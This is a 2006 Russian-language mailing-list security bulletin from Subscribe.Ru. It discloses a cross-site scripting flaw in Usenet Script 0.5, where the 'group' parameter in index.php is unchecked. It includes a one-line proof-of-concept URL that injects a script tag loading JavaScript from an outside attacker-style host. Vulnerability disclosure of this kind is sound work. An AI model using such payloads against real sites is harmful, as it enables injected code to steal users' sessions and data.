Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Usenet Script. (comp.paper.supuser) : Рассылка : Subscribe.Ru

Отправляет email-рассылки с помощью сервиса Sendsay

IT-безопасность в быту и не только

Рассылка закрыта

При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.

Вы можете найти рассылки сходной тематики в Каталоге рассылок.

← Июль 2006 →
	1 01.07.2006 07:05:31 10:05:14 12:05:15 15:05:06 17:05:07	2 02.07.2006 10:05:29 12:05:10
3	4	5	6	7	8	9
10	11	12	13	14	15	16
17	18	19	20	21	22	23
24	25 25.07.2006 07:05:44 10:05:06 12:05:32 15:05:10	26	27	28	29	30
31

Автор

Forester

Статистика

1.394 подписчиков
-1 за неделю

← Все выпуски →

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Usenet Script.

Компьютер для продвинутых пользователей

В этом выпуске:

Usenet Script

ПО: Usenet Script
Версия: 0.5

О Usenet Script:
Срипт новостей использующий SQL базу данных. При разработке использовались базы данных Postgresql, но она использует dbx и должна, поэтому работать в других системах баз данных.
Описание:
В файле index.php не проверяется переменная group, что позволяет применить XSS-атаку, вставив JavaSciript код.
Пример использования:
http://www.example.com/index.php?group=<script src=http://www.youfucktard.com/xss.js></script>

Не забудьте проголосовать за выпуск!

Рассылка создана и ведется при поддержке Информационной сети Пермского края.

Меня можно найти:	ICQ - 273214003
	e-mail - isdmi1::mail.ru

В избранное

← Июль 2006 →
					1 01.07.2006 07:05:31 10:05:14 12:05:15 15:05:06 17:05:07	2 02.07.2006 10:05:29 12:05:10
3	4	5	6	7	8	9
10	11	12	13	14	15	16
17	18	19	20	21	22	23
24	25 25.07.2006 07:05:44 10:05:06 12:05:32 15:05:10	26	27	28	29	30
31